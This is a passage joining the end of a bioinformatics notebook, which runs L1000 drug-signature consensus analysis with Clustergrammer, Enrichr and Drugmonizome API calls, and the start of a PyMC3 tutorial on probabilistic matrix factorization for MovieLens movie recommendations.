print(e)
# enriched = {lib:{"mimickers": {}, "reversers": {}} for lib in datasets}
enriched = {"mimickers": {lib: {} for lib in datasets}, "reversers": {lib: {} for lib in datasets}}
metadata = {}
for k,sig in tqdm(signatures.items()):
try:
time.sleep(0.1)
genes = convert_genes(sig["up_genes"],sig["down_genes"])
if ("entities" in genes and len(genes["entities"]) > 5) or (len(genes["up_entities"]) > 5 and len(genes["down_entities"]) > 5):
for lib in datasets:
library = dataset_map[lib]
s = signature_search(genes, library)
if gene_set_direction == None:
sigs = resolve_ranktwosided(s)
else:
sigs = resolve_rank(s, gene_set_direction)
enriched["mimickers"][lib][k] = sigs["mimickers"]
enriched["reversers"][lib][k] = sigs["reversers"]
for direction, entries in sigs.items():
for label, meta in entries.items():
if label not in metadata:
metadata[label] = {
"pert_name": meta.get("pert_name", None),
"pert_time": meta.get("pert_time", None),
"pert_dose": meta.get("pert_dose", None),
"cell_line": meta.get("cell_line", None),
}
time.sleep(0.1)
except Exception as e:
print(e)
def clustergrammer(df, name, figure, label="Clustergrammer"):
clustergram_df = df.rename(columns={i:"Signature: %s"%i for i in df.columns}, index={i:"Drug: %s"%i for i in df.index})
clustergram_df.to_csv(name, sep="\t")
response = ''
timeout = 0.5
for i in range(5):
try:
res = requests.post(CLUSTERGRAMMER_URL, files={'file': open(name, 'rb')})
if not res.ok:
response = res.text
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
clustergrammer_url = res.text.replace("http:","https:")
break
except Exception as e:
response = e
time.sleep(2)
else:
if type(response) == Exception:
raise response
else:
raise Exception(response)
display(IFrame(clustergrammer_url, width="1000", height="1000"))
display(Markdown("**Figure %d** %s [Go to url](%s)"%(figure, label, clustergrammer_url)))
figure += 1
return figure
cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=1, dark=0)
def heatmap(df, filename, figure, label, width=15, height=15):
fig = plt.figure(figsize=(width,height))
cg = sns.clustermap(df, cmap=cmap, figsize=(width, height))
cg.ax_row_dendrogram.set_visible(False)
cg.ax_col_dendrogram.set_visible(False)
display(cg)
plt.show()
cg.savefig(filename)
display(Markdown("**Figure %d** %s"%(figure, label)))
figure+=1
return figure
def make_clickable(link):
# target _blank to open new window
# extract clickable text to display for your link
text = link.split('=')[1]
return f'<a target="_blank" href="{link}">{text}</a>'
annot_dict = {}
def bar_chart(enrichment, title=''):
bar_color = 'mediumspringgreen'
bar_color_not_sig = 'lightgrey'
edgecolor=None
linewidth=0
if len(enrichment) > 10:
enrichment = enrichment[0:10]
enrichment_names = [i["name"] for i in enrichment]
enrichment_scores = [i["pval"] for i in enrichment]
plt.figure(figsize=(10,4))
bar_colors = [bar_color if (x < 0.05) else bar_color_not_sig for x in enrichment_scores]
fig = sns.barplot(x=np.log10(enrichment_scores)*-1, y=enrichment_names, palette=bar_colors, edgecolor=edgecolor, linewidth=linewidth)
fig.axes.get_yaxis().set_visible(False)
fig.set_title(title.replace('_',' '),fontsize=20)
fig.set_xlabel('-Log10(p-value)',fontsize=19)
fig.xaxis.set_major_locator(MaxNLocator(integer=True))
fig.tick_params(axis='x', which='major', labelsize=20)
if max(np.log10(enrichment_scores)*-1)<1:
fig.xaxis.set_ticks(np.arange(0, max(np.log10(enrichment_scores)*-1), 0.1))
for ii,annot in enumerate(enrichment_names):
if annot in annot_dict.keys():
annot = annot_dict[annot]
if enrichment_scores[ii] < 0.05:
annot = ' *'.join([annot, str(str(np.format_float_scientific(enrichment_scores[ii],precision=2)))])
else:
annot = ' '.join([annot, str(str(np.format_float_scientific(enrichment_scores[ii],precision=2)))])
title_start= max(fig.axes.get_xlim())/200
fig.text(title_start,ii,annot,ha='left',wrap = True, fontsize = 12)
fig.patch.set_edgecolor('black')
fig.patch.set_linewidth('2')
plt.show()
def get_drugmonizome_plot(consensus, label, figure, dataset):
payload = {
"filter":{
"where": {
"meta.Name": {
"inq": [i.lower() for i in set(consensus['pert name'])]
}
}
}
}
res = requests.post(drugmonizome_meta_api + "/entities/find", json=payload)
entities = {}
for i in res.json():
name = i["meta"]["Name"]
uid = i["id"]
if name not in entities:
entities[name] = uid
query = {
"entities": list(entities.values()),
"limit": 1000,
"database": dataset
}
res = requests.post(drugmonizome_data_api + "/enrich/overlap", json=query)
scores = res.json()["results"]
uids = {i["uuid"]: i for i in scores}
payload = {
"filter":{
"where": {
"id": {
"inq": list(uids.keys())
}
}
}
}
res = requests.post(drugmonizome_meta_api + "/signatures/find", json=payload)
sigs = res.json()
sigs = res.json()
scores = []
for i in sigs:
score = uids[i["id"]]
scores.append({
"name": i["meta"]["Term"][0]["Name"],
"pval": score["p-value"]
})
scores.sort(key=lambda x: x['pval'])
if len(scores) > 0:
bar_chart(scores, dataset.replace("setlibrary", " set library"))
display(Markdown("**Figure %d** %s"%(figure, label)))
figure += 1
return figure
def get_enrichr_bar(userListId, enrichr_library, figure, label):
query_string = '?userListId=%s&backgroundType=%s'
res = requests.get(
enrichr_api + 'enrich' + query_string % (userListId, enrichr_library)
)
if not res.ok:
raise Exception('Error fetching enrichment results')
data = res.json()[enrichr_library]
scores = [{"name": i[1], "pval": i[2]} for i in data]
scores.sort(key=lambda x: x['pval'])
if len(scores) > 0:
bar_chart(scores, enrichr_library)
display(Markdown("**Figure %d** %s"%(figure, label)))
figure +=1
return figure
def enrichment(consensus, label, figure):
gene_names = [i.upper() for i in set(consensus['pert name'])]
genes_str = '\n'.join(gene_names)
description = label
payload = {
'list': (None, genes_str),
'description': (None, description)
}
res = requests.post(enrichr_api + 'addList', files=payload)
if not res.ok:
raise Exception('Error analyzing gene list')
data = res.json()
shortId = data["shortId"]
userListId = data["userListId"]
display(Markdown("Enrichr Link: https://maayanlab.cloud/Enrichr/enrich?dataset=%s"%shortId))
for d in enrichr_libraries:
l = "Enrichr %s top ranked terms for %s"%(d.replace("_", " "), label)
figure = get_enrichr_bar(userListId, d, figure, l)
return figure
```
## Consensus Analysis
Mimicking and reversing perturbagen scores are organized into a matrix. Depending on the consensus method chosen by the user, the consensus signatures are computed either by ranking the sum of z-scores or z-sum; or by counts.
### Mimickers
```
score_field = "z-sum" if gene_set_direction == None else "z-score"
top_n_signatures = 100
direction = "mimickers"
alternate = "mimicking"
for lib in datasets:
library = dataset_map[lib]
display(Markdown("#### Consensus %s %s signatures"%(alternate, labeller[lib])), display_id=alternate+lib)
index = set()
sig_dict = enriched[direction][lib]
for v in sig_dict.values():
index = index.union(v.keys())
df = pd.DataFrame(0, index=index, columns=sig_dict.keys())
for sig_name,v in sig_dict.items():
for local_id, meta in v.items():
df.at[local_id, sig_name] = meta[score_field]
filename = "sig_matrix_%s_%s.tsv"%(library.replace(" ","_"), direction)
df.to_csv(filename, sep="\t")
display(Markdown("Download score matrix for %s %s signatures ([download](./%s))"%
(alternate, labeller[lib], filename)))
if len(df.index) > 1 and len(df.columns) > 1:
top_index = df.index
if len(top_index) > top_n_signatures:
top_index = df[(df>0).sum(1) >= min_sigs].sum(1).sort_values(ascending=False).index
top_index = top_index if len(top_index) <= top_n_signatures else top_index[0:top_n_signatures]
if (df.loc[top_index].sum()>0).sum() < len(df.columns):
blank = df.loc[top_index].sum()==0
blank_indices = [i for i in blank.index if blank[i]]
top_index = list(top_index) + [df[i].idxmax() for i in blank_indices]
top_df = df.loc[top_index]
consensus_norm = quantile_normalize(top_df)
display(Markdown("##### Clustergrammer for %s %s perturbagens"%(alternate, labeller[lib])), display_id="%s-clustergrammer-%s"%(alternate, lib))
label = "Clustergrammer of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)"%(alternate, labeller[lib])
name = "clustergrammer_%s_%s.tsv"%(library.replace(" ", "_"), direction)
figure = clustergrammer(consensus_norm, name, figure, label)
display(Markdown("#### Heatmap for %s %s perturbagens"%(alternate, labeller[lib])), display_id="%s-heatmap-%s"%(alternate, lib))
label = "Heatmap of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)"%(alternate, labeller[lib])
name = "heatmap_%s_%s.png"%(library.replace(" ", "_"), direction)
figure = heatmap(consensus_norm, name, figure, label)
df = df[(df>0).sum(1) >= min_sigs]
if consensus_method == 'z-score':
df = df.loc[df.sum(1).sort_values(ascending=False).index[0:top_perts]]
else:
df = df.loc[(df > 0).sum(1).sort_values(ascending=False).index[0:top_perts]]
if lib in gene_page:
# "pert_name": sig["meta"].get("pert_name", None),
# "pert_time": sig["meta"].get("pert_time", None),
# "pert_dose": sig["meta"].get("pert_dose", None),
# "cell_line": sig["meta"].get("cell_line", None),
stat_df = pd.DataFrame(index=df.index, columns=["pert name", "pert time", "cell line", "count", "z-sum", "Enrichr gene page"])
stat_df['count'] = (df > 0).sum(1)
# Compute zstat and p value
stat_df["z-sum"] = df.sum(1)
for i in stat_df.index:
stat_df.at[i, "pert name"] = metadata[i]["pert_name"]
stat_df.at[i, "pert time"] = metadata[i]["pert_time"]
stat_df.at[i, "cell line"] = metadata[i]["cell_line"]
stat_df['Enrichr gene page'] = ["https://maayanlab.cloud/Enrichr/#find!gene=%s"%i for i in stat_df["pert name"]]
stat_df = stat_df.fillna("-")
filename = "sig_stat_%s_%s.tsv"%(lib.replace(" ","_"), direction)
stat_df.to_csv(filename, sep="\t")
stat_df['Enrichr gene page'] = stat_df['Enrichr gene page'].apply(make_clickable)
stat_html = stat_df.head(25).to_html(escape=False)
display(HTML(stat_html))
else:
stat_df = pd.DataFrame(index=df.index, columns=["pert name", "pert dose", "pert time", "cell line", "count", "z-sum"])
stat_df['count'] = (df > 0).sum(1)
stat_df["z-sum"] = df.sum(1)
for i in stat_df.index:
stat_df.at[i, "pert name"] = metadata[i]["pert_name"]
stat_df.at[i, "pert dose"] = metadata[i]["pert_dose"]
stat_df.at[i, "pert time"] = metadata[i]["pert_time"]
stat_df.at[i, "cell line"] = metadata[i]["cell_line"]
stat_df = stat_df.fillna("-")
filename = "sig_stat_%s_%s.tsv"%(library.replace(" ","_"), direction)
stat_df.to_csv(filename, sep="\t")
display(stat_df.head(25))
display(Markdown("**Table %d** Top 25 consensus %s %s signatures([download](./%s))"%
(table, alternate, labeller[lib], filename)))
table+=1
# display(df.head())
# display(Markdown("**Table %d** Consensus %s %s signatures ([download](./%s))"%
# (table, alternate, labeller[lib], filename)))
# table+=1
if len(set(stat_df["pert name"])) > 5:
if lib in drug_page:
display(Markdown("#### Drugmonizome enrichment analysis for the consensus %s %s perturbagens"% (alternate, labeller[lib])))
for d in drugmonizome_datasets:
label = "%s top ranked enriched terms for %s %s perturbagens"%(d.replace("_", " "), alternate, labeller[lib])
figure = get_drugmonizome_plot(stat_df, label, figure, d)
elif lib in gene_page:
display(Markdown("#### Enrichr link to analyze enriched terms for the consensus %s %s perturbagens"% (alternate, labeller[lib])))
label = "%s L1000 %s perturbagens"%(alternate, labeller[lib])
figure = enrichment(stat_df, label, figure)
```
### Reversers
```
direction = "reversers"
alternate = "reversing"
for lib in datasets:
library = dataset_map[lib]
display(Markdown("#### Consensus %s %s signatures"%(alternate, labeller[lib])), display_id=alternate+lib)
index = set()
sig_dict = enriched[direction][lib]
for v in sig_dict.values():
index = index.union(v.keys())
df = pd.DataFrame(0, index=index, columns=sig_dict.keys())
for sig_name,v in sig_dict.items():
for local_id, meta in v.items():
df.at[local_id, sig_name] = meta[score_field]
filename = "sig_matrix_%s_%s.tsv"%(library.replace(" ","_"), direction)
df.to_csv(filename, sep="\t")
display(Markdown("Download score matrix for %s %s signatures ([download](./%s))"%
(alternate, labeller[lib], filename)))
if len(df.index) > 1 and len(df.columns) > 1:
top_index = df.index
if len(top_index) > top_n_signatures:
top_index = df[(df>0).sum(1) >= min_sigs].sum(1).sort_values(ascending=False).index
top_index = top_index if len(top_index) <= top_n_signatures else top_index[0:top_n_signatures]
if (df.loc[top_index].sum()>0).sum() < len(df.columns):
blank = df.loc[top_index].sum()==0
blank_indices = [i for i in blank.index if blank[i]]
top_index = list(top_index) + [df[i].idxmax() for i in blank_indices]
top_df = df.loc[top_index]
consensus_norm = quantile_normalize(top_df)
display(Markdown("##### Clustergrammer for %s %s perturbagens"%(alternate, labeller[lib])), display_id="%s-clustergrammer-%s"%(alternate, lib))
label = "Clustergrammer of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)"%(alternate, labeller[lib])
name = "clustergrammer_%s_%s.tsv"%(library.replace(" ", "_"), direction)
figure = clustergrammer(consensus_norm, name, figure, label)
display(Markdown("#### Heatmap for %s %s perturbagens"%(alternate, labeller[lib])), display_id="%s-heatmap-%s"%(alternate, lib))
label = "Heatmap of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)"%(alternate, labeller[lib])
name = "heatmap_%s_%s.png"%(library.replace(" ", "_"), direction)
figure = heatmap(consensus_norm, name, figure, label)
df = df[(df>0).sum(1) >= min_sigs]
if consensus_method == 'z-score':
df = df.loc[df.sum(1).sort_values(ascending=False).index[0:top_perts]]
else:
df = df.loc[(df > 0).sum(1).sort_values(ascending=False).index[0:top_perts]]
if lib in gene_page:
# "pert_name": sig["meta"].get("pert_name", None),
# "pert_time": sig["meta"].get("pert_time", None),
# "pert_dose": sig["meta"].get("pert_dose", None),
# "cell_line": sig["meta"].get("cell_line", None),
stat_df = pd.DataFrame(index=df.index, columns=["pert name", "pert time", "cell line", "count", "z-sum", "Enrichr gene page"])
stat_df['count'] = (df > 0).sum(1)
# Compute zstat and p value
stat_df["z-sum"] = df.sum(1)
for i in stat_df.index:
stat_df.at[i, "pert name"] = metadata[i]["pert_name"]
stat_df.at[i, "pert time"] = metadata[i]["pert_time"]
stat_df.at[i, "cell line"] = metadata[i]["cell_line"]
stat_df['Enrichr gene page'] = ["https://maayanlab.cloud/Enrichr/#find!gene=%s"%i for i in stat_df["pert name"]]
stat_df = stat_df.fillna("-")
filename = "sig_stat_%s_%s.tsv"%(lib.replace(" ","_"), direction)
stat_df.to_csv(filename, sep="\t")
stat_df['Enrichr gene page'] = stat_df['Enrichr gene page'].apply(make_clickable)
stat_html = stat_df.head(25).to_html(escape=False)
display(HTML(stat_html))
else:
stat_df = pd.DataFrame(index=df.index, columns=["pert name", "pert dose", "pert time", "cell line", "count", "z-sum"])
stat_df['count'] = (df > 0).sum(1)
stat_df["z-sum"] = df.sum(1)
for i in stat_df.index:
stat_df.at[i, "pert name"] = metadata[i]["pert_name"]
stat_df.at[i, "pert dose"] = metadata[i]["pert_dose"]
stat_df.at[i, "pert time"] = metadata[i]["pert_time"]
stat_df.at[i, "cell line"] = metadata[i]["cell_line"]
stat_df = stat_df.fillna("-")
filename = "sig_stat_%s_%s.tsv"%(library.replace(" ","_"), direction)
stat_df.to_csv(filename, sep="\t")
display(stat_df.head(25))
display(Markdown("**Table %d** Top 25 consensus %s %s signatures([download](./%s))"%
(table, alternate, labeller[lib], filename)))
table+=1
# display(df.head())
# display(Markdown("**Table %d** Consensus %s %s signatures ([download](./%s))"%
# (table, alternate, labeller[lib], filename)))
# table+=1
if len(set(stat_df["pert name"])) > 5:
if lib in drug_page:
display(Markdown("#### Drugmonizome enrichment analysis for the consensus %s %s perturbagens"% (alternate, labeller[lib])))
for d in drugmonizome_datasets:
label = "%s top ranked enriched terms for %s %s perturbagens"%(d.replace("_", " "), alternate, labeller[lib])
figure = get_drugmonizome_plot(stat_df, label, figure, d)
elif lib in gene_page:
display(Markdown("#### Enrichr link to analyze enriched terms for the consensus %s %s perturbagens"% (alternate, labeller[lib])))
label = "%s L1000 %s perturbagens"%(alternate, labeller[lib])
figure = enrichment(stat_df, label, figure)
```
## References
[1] Subramanian, A., Narayan, R., Corsello, S. M., Peck, D. D., Natoli, T. E., Lu, X., ... & Golub, T. R. (2017). A next generation connectivity map: L1000 platform and the first 1,000,000 profiles. Cell, 171(6), 1437-1452.
[2] Fernandez, N. F., Gundersen, G. W., Rahman, A., Grimes, M. L., Rikova, K., Hornbeck, P., & Ma’ayan, A. (2017). Clustergrammer, a web-based heatmap visualization and analysis tool for high-dimensional biological data. Scientific data, 4(1), 1-12.
[3] Chen, E. Y., Tan, C. M., Kou, Y., Duan, Q., Wang, Z., Meirelles, G. V., ... & Ma’ayan, A. (2013). Enrichr: interactive and collaborative HTML5 gene list enrichment analysis tool. BMC bioinformatics, 14(1), 1-14.
[4] Kuleshov, Maxim V., et al. "Enrichr: a comprehensive gene set enrichment analysis web server 2016 update." Nucleic acids research 44.W1 (2016): W90-W97.
[5] Xie, Z., Bailey, A., Kuleshov, M. V., Clarke, D. J., Evangelista, J. E., Jenkins, S. L., ... & Ma'ayan, A. (2021). Gene set knowledge discovery with Enrichr. Current protocols, 1(3), e90.
[6] Kropiwnicki, E., Evangelista, J. E., Stein, D. J., Clarke, D. J., Lachmann, A., Kuleshov, M. V., ... & Ma’ayan, A. (2021). Drugmonizome and Drugmonizome-ML: integration and abstraction of small molecule attributes for drug enrichment analysis and machine learning. Database, 2021.
[7] Maglott, D., Ostell, J., Pruitt, K. D., & Tatusova, T. (2005). Entrez Gene: gene-centered information at NCBI. Nucleic acids research, 33(suppl_1), D54-D58.
[8] Brown, G. R., Hem, V., Katz, K. S., Ovetsky, M., Wallin, C., Ermolaeva, O., ... & Murphy, T. D. (2015). Gene: a gene-centered information resource at NCBI. Nucleic acids research, 43(D1), D36-D42.
|
github_jupyter
|
# Probabilistic Matrix Factorization for Making Personalized Recommendations
```
%matplotlib inline
import numpy as np
import pandas as pd
import pymc3 as pm
from matplotlib import pyplot as plt
plt.style.use("seaborn-darkgrid")
print(f"Running on PyMC3 v{pm.__version__}")
```
## Motivation
So you are browsing for something to watch on Netflix and just not liking the suggestions. You just know you can do better. All you need to do is collect some ratings data from yourself and friends and build a recommendation algorithm. This notebook will guide you in doing just that!
We'll start out by getting some intuition for how our model will work. Then we'll formalize our intuition. Afterwards, we'll examine the dataset we are going to use. Once we have some notion of what our data looks like, we'll define some baseline methods for predicting preferences for movies. Following that, we'll look at Probabilistic Matrix Factorization (PMF), which is a more sophisticated Bayesian method for predicting preferences. Having detailed the PMF model, we'll use PyMC3 for MAP estimation and MCMC inference. Finally, we'll compare the results obtained with PMF to those obtained from our baseline methods and discuss the outcome.
## Intuition
Normally if we want recommendations for something, we try to find people who are similar to us and ask their opinions. If Bob, Alice, and Monty are all similar to me, and they all like crime dramas, I'll probably like crime dramas. Now this isn't always true. It depends on what we consider to be "similar". In order to get the best bang for our buck, we really want to look for people who have the most similar taste. Taste being a complex beast, we'd probably like to break it down into something more understandable. We might try to characterize each movie in terms of various factors. Perhaps films can be moody, light-hearted, cinematic, dialogue-heavy, big-budget, etc. Now imagine we go through IMDB and assign each movie a rating in each of the categories. How moody is it? How much dialogue does it have? What's its budget? Perhaps we use numbers between 0 and 1 for each category. Intuitively, we might call this the film's profile.
Now let's suppose we go back to those 5 movies we rated. At this point, we can get a richer picture of our own preferences by looking at the film profiles of each of the movies we liked and didn't like. Perhaps we take the averages across the 5 film profiles and call this our ideal type of film. In other words, we have computed some notion of our inherent _preferences_ for various types of movies. Suppose Bob, Alice, and Monty all do the same. Now we can compare our preferences and determine how similar each of us really are. I might find that Bob is the most similar and the other two are still more similar than other people, but not as much as Bob. So I want recommendations from all three people, but when I make my final decision, I'm going to put more weight on Bob's recommendation than those I get from Alice and Monty.
While the above procedure sounds fairly effective as is, it also reveals an unexpected additional source of information. If we rated a particular movie highly, and we know its film profile, we can compare with the profiles of other movies. If we find one with very close numbers, it is probable we'll also enjoy this movie. Both this approach and the one above are commonly known as _neighborhood approaches_. Techniques that leverage both of these approaches simultaneously are often called _collaborative filtering_ [[1]](http://www2.research.att.com/~volinsky/papers/ieeecomputer.pdf). The first approach we talked about uses user-user similarity, while the second uses item-item similarity. Ideally, we'd like to use both sources of information. The idea is we have a lot of items available to us, and we'd like to work together with others to filter the list of items down to those we'll each like best. My list should have the items I'll like best at the top and those I'll like least at the bottom. Everyone else wants the same. If I get together with a bunch of other people, we all watch 5 movies, and we have some efficient computational process to determine similarity, we can very quickly order the movies to our liking.
## Formalization
Let's take some time to make the intuitive notions we've been discussing more concrete. We have a set of $M$ movies, or _items_ ($M = 100$ in our example above). We also have $N$ people, whom we'll call _users_ of our recommender system. For each item, we'd like to find a $D$ dimensional factor composition (film profile above) to describe the item. Ideally, we'd like to do this without actually going through and manually labeling all of the movies. Manual labeling would be both slow and error-prone, as different people will likely label movies differently. So we model each movie as a $D$ dimensional vector, which is its latent factor composition. Furthermore, we expect each user to have some preferences, but without our manual labeling and averaging procedure, we have to rely on the latent factor compositions to learn $D$ dimensional latent preference vectors for each user. The only thing we get to observe is the $N \times M$ ratings matrix $R$ provided by the users. Entry $R_{ij}$ is the rating user $i$ gave to item $j$. Many of these entries may be missing, since most users will not have rated all 100 movies. Our goal is to fill in the missing values with predicted ratings based on the latent variables $U$ and $V$. We denote the predicted ratings by $R_{ij}^*$. We also define an indicator matrix $I$, with entry $I_{ij} = 0$ if $R_{ij}$ is missing and $I_{ij} = 1$ otherwise.
So we have an $N \times D$ matrix of user preferences which we'll call $U$ and an $M \times D$ factor composition matrix we'll call $V$. We also have a $N \times M$ rating matrix we'll call $R$. We can think of each row $U_i$ as indications of how much each user prefers each of the $D$ latent factors. Each row $V_j$ can be thought of as how much each item can be described by each of the latent factors. In order to make a recommendation, we need a suitable prediction function which maps a user preference vector $U_i$ and an item latent factor vector $V_j$ to a predicted ranking. The choice of this prediction function is an important modeling decision, and a variety of prediction functions have been used. Perhaps the most common is the dot product of the two vectors, $U_i \cdot V_j$ [[1]](http://www2.research.att.com/~volinsky/papers/ieeecomputer.pdf).
To better understand CF techniques, let us explore a particular example. Imagine we are seeking to recommend movies using a model which infers five latent factors, $V_j$, for $j = 1,2,3,4,5$. In reality, the latent factors are often unexplainable in a straightforward manner, and most models make no attempt to understand what information is being captured by each factor. However, for the purposes of explanation, let us assume the five latent factors might end up capturing the film profile we were discussing above. So our five latent factors are: moody, light-hearted, cinematic, dialogue, and budget. Then for a particular user $i$, imagine we infer a preference vector $U_i = <0.5, 0.1, 1.5, 1.1, 0.3>$. Also, for a particular item $j$, we infer these values for the latent factors: $V_j = <0.5, 1.5, 1.25, 0.8, 0.9>$. Using the dot product as the prediction function, we would calculate 3.425 as the ranking for that item, which is more or less a neutral preference given our 1 to 5 rating scale.
$$ 0.5 \times 0.5 + 0.1 \times 1.5 + 1.5 \times 1.25 + 1.1 \times 0.8 + 0.3 \times 0.9 = 3.425 $$
## Data
The [MovieLens 100k dataset](https://grouplens.org/datasets/movielens/100k/) was collected by the GroupLens Research Project at the University of Minnesota. This data set consists of 100,000 ratings (1-5) from 943 users on 1682 movies. Each user rated at least 20 movies, and be have basic information on the users (age, gender, occupation, zip). Each movie includes basic information like title, release date, video release date, and genre. We will implement a model that is suitable for collaborative filtering on this data and evaluate it in terms of root mean squared error (RMSE) to validate the results.
The data was collected through the MovieLens web site
(movielens.umn.edu) during the seven-month period from September 19th,
1997 through April 22nd, 1998. This data has been cleaned up - users
who had less than 20 ratings or did not have complete demographic
information were removed from this data set.
Let's begin by exploring our data. We want to get a general feel for what it looks like and a sense for what sort of patterns it might contain. Here are the user rating data:
```
data = pd.read_csv(
pm.get_data("ml_100k_u.data"), sep="\t", names=["userid", "itemid", "rating", "timestamp"]
)
data.head()
```
And here is the movie detail data:
```
# fmt: off
movie_columns = ['movie id', 'movie title', 'release date', 'video release date', 'IMDb URL',
'unknown','Action','Adventure', 'Animation',"Children's", 'Comedy', 'Crime',
'Documentary', 'Drama', 'Fantasy', 'Film-Noir', 'Horror', 'Musical', 'Mystery',
'Romance', 'Sci-Fi', 'Thriller', 'War', 'Western']
# fmt: on
movies = pd.read_csv(
pm.get_data("ml_100k_u.item"),
sep="|",
names=movie_columns,
index_col="movie id",
parse_dates=["release date"],
)
movies.head()
# Extract the ratings from the DataFrame
ratings = data.rating
# Plot histogram
data.groupby("rating").size().plot(kind="bar");
data.rating.describe()
```
This must be a decent batch of movies. From our exploration above, we know most ratings are in the range 3 to 5, and positive ratings are more likely than negative ratings. Let's look at the means for each movie to see if we have any particularly good (or bad) movie here.
```
movie_means = data.join(movies["movie title"], on="itemid").groupby("movie title").rating.mean()
movie_means[:50].plot(kind="bar", grid=False, figsize=(16, 6), title="Mean ratings for 50 movies");
```
While the majority of the movies generally get positive feedback from users, there are definitely a few that stand out as bad. Let's take a look at the worst and best movies, just for fun:
```
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(16, 4), sharey=True)
movie_means.nlargest(30).plot(kind="bar", ax=ax1, title="Top 30 movies in data set")
movie_means.nsmallest(30).plot(kind="bar", ax=ax2, title="Bottom 30 movies in data set");
```
Make sense to me. We now know there are definite popularity differences between the movies. Some of them are simply better than others, and some are downright lousy. Looking at the movie means allowed us to discover these general trends. Perhaps there are similar trends across users. It might be the case that some users are simply more easily entertained than others. Let's take a look.
```
user_means = data.groupby("userid").rating.mean().sort_values()
_, ax = plt.subplots(figsize=(16, 6))
ax.plot(np.arange(len(user_means)), user_means.values, "k-")
ax.fill_between(np.arange(len(user_means)), user_means.values, alpha=0.3)
ax.set_xticklabels("")
# 1000 labels is nonsensical
ax.set_ylabel("Rating")
ax.set_xlabel(f"{len(user_means)} average ratings per user")
ax.set_ylim(0, 5)
ax.set_xlim(0, len(user_means));
```
We see even more significant trends here. Some users rate nearly everything highly, and some (though not as many) rate nearly everything negatively. These observations will come in handy when considering models to use for predicting user preferences on unseen movies.
## Methods
Having explored the data, we're now ready to dig in and start addressing the problem. We want to predict how much each user is going to like all of the movies he or she has not yet read.
### Baselines
Every good analysis needs some kind of baseline methods to compare against. It's difficult to claim we've produced good results if we have no reference point for what defines "good". We'll define three very simple baseline methods and find the RMSE using these methods. Our goal will be to obtain lower RMSE scores with whatever model we produce.
#### Uniform Random Baseline
Our first baseline is about as dead stupid as you can get. Every place we see a missing value in $R$, we'll simply fill it with a number drawn uniformly at random in the range [1, 5]. We expect this method to do the worst by far.
$$R_{ij}^* \sim Uniform$$
#### Global Mean Baseline
This method is only slightly better than the last. Wherever we have a missing value, we'll fill it in with the mean of all observed ratings.
$$\text{global_mean} = \frac{1}{N \times M} \sum_{i=1}^N \sum_{j=1}^M I_{ij}(R_{ij})$$
$$R_{ij}^* = \text{global_mean}$$
#### Mean of Means Baseline
Now we're going to start getting a bit smarter. We imagine some users might be easily amused, and inclined to rate all movies more highly. Other users might be the opposite. Additionally, some movies might simply be more witty than others, so all users might rate some movies more highly than others in general. We can clearly see this in our graph of the movie means above. We'll attempt to capture these general trends through per-user and per-movie rating means. We'll also incorporate the global mean to smooth things out a bit. So if we see a missing value in cell $R_{ij}$, we'll average the global mean with the mean of $U_i$ and the mean of $V_j$ and use that value to fill it in.
$$\text{user_means} = \frac{1}{M} \sum_{j=1}^M I_{ij}(R_{ij})$$
$$\text{movie_means} = \frac{1}{N} \sum_{i=1}^N I_{ij}(R_{ij})$$
$$R_{ij}^* = \frac{1}{3} \left(\text{user_means}_i + \text{ movie_means}_j + \text{ global_mean} \right)$$
```
# Create a base class with scaffolding for our 3 baselines.
def split_title(title):
"""Change "BaselineMethod" to "Baseline Method"."""
words = []
tmp = [title[0]]
for c in title[1:]:
if c.isupper():
words.append("".join(tmp))
tmp = [c]
else:
tmp.append(c)
words.append("".join(tmp))
return " ".join(words)
class Baseline:
"""Calculate baseline predictions."""
def __init__(self, train_data):
"""Simple heuristic-based transductive learning to fill in missing
values in data matrix."""
self.predict(train_data.copy())
def predict(self, train_data):
raise NotImplementedError("baseline prediction not implemented for base class")
def rmse(self, test_data):
"""Calculate root mean squared error for predictions on test data."""
return rmse(test_data, self.predicted)
def __str__(self):
return split_title(self.__class__.__name__)
# Implement the 3 baselines.
class UniformRandomBaseline(Baseline):
"""Fill missing values with uniform random values."""
def predict(self, train_data):
nan_mask = np.isnan(train_data)
masked_train = np.ma.masked_array(train_data, nan_mask)
pmin, pmax = masked_train.min(), masked_train.max()
N = nan_mask.sum()
train_data[nan_mask] = np.random.uniform(pmin, pmax, N)
self.predicted = train_data
class GlobalMeanBaseline(Baseline):
"""Fill in missing values using the global mean."""
def predict(self, train_data):
nan_mask = np.isnan(train_data)
train_data[nan_mask] = train_data[~nan_mask].mean()
self.predicted = train_data
class MeanOfMeansBaseline(Baseline):
"""Fill in missing values using mean of user/item/global means."""
def predict(self, train_data):
nan_mask = np.isnan(train_data)
masked_train = np.ma.masked_array(train_data, nan_mask)
global_mean = masked_train.mean()
user_means = masked_train.mean(axis=1)
item_means = masked_train.mean(axis=0)
self.predicted = train_data.copy()
n, m = train_data.shape
for i in range(n):
for j in range(m):
if np.ma.isMA(item_means[j]):
self.predicted[i, j] = np.mean((global_mean, user_means[i]))
else:
self.predicted[i, j] = np.mean((global_mean, user_means[i], item_means[j]))
baseline_methods = {}
baseline_methods["ur"] = UniformRandomBaseline
baseline_methods["gm"] = GlobalMeanBaseline
baseline_methods["mom"] = MeanOfMeansBaseline
num_users = data.userid.unique().shape[0]
num_items = data.itemid.unique().shape[0]
sparsity = 1 - len(data) / (num_users * num_items)
print(f"Users: {num_users}\nMovies: {num_items}\nSparsity: {sparsity}")
dense_data = data.pivot(index="userid", columns="itemid", values="rating").values
```
## Probabilistic Matrix Factorization
